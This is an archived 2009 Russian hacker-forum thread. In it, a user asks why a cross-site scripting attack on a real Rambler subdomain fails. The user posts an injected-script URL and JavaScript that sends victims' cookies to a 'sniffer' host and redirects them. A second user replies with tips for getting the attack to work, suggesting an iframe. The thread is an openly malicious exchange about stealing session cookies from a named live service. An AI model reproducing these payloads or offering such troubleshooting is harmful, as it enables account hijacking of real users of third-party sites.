Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

xss rambler.ru проблема

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> xss rambler.ru проблема
Имя
Сообщение << Старые топики   Новые топики >>
xss rambler.ru проблема - 2009-06-12 14:58:31.006666   
DIMON4G

Сообщений: 34
Оценки: 0
Присоединился: 2008-10-26 13:12:46.123333
Делаю вот так:
http://sub.rambler.ru/catalog/rambler/news/?login="&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; то всё норм куки есть, как полагается

А когда начинаю делать так:
http://sub.rambler.ru/catalog/rambler/news/?login="&gt;&lt;script src=http://site.ru/js.js&gt;&lt;/script&gt;
в js.js такой код:
img = new Image(); img.src = "http://снифер/s.gif?"+document.cookie; document.location.href=http://куда_перенаправить"; И почему не катит нихрина? нет редиректа и нет кук в снифере :mad:
Post #: 1
RE: xss rambler.ru проблема - 2009-06-16 05:55:10.490000   
Viglim [23]

Сообщений: 4
Оценки: 0
Присоединился: 2009-06-15 14:01:36.006666
Просто в разных браузерах работает по разному. В фаирфоксе например, так не прокатит. Сделай через iframe.
Post #: 2
Страниц:  [1]
Все форумы >> [В Сети] >> xss rambler.ru проблема







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.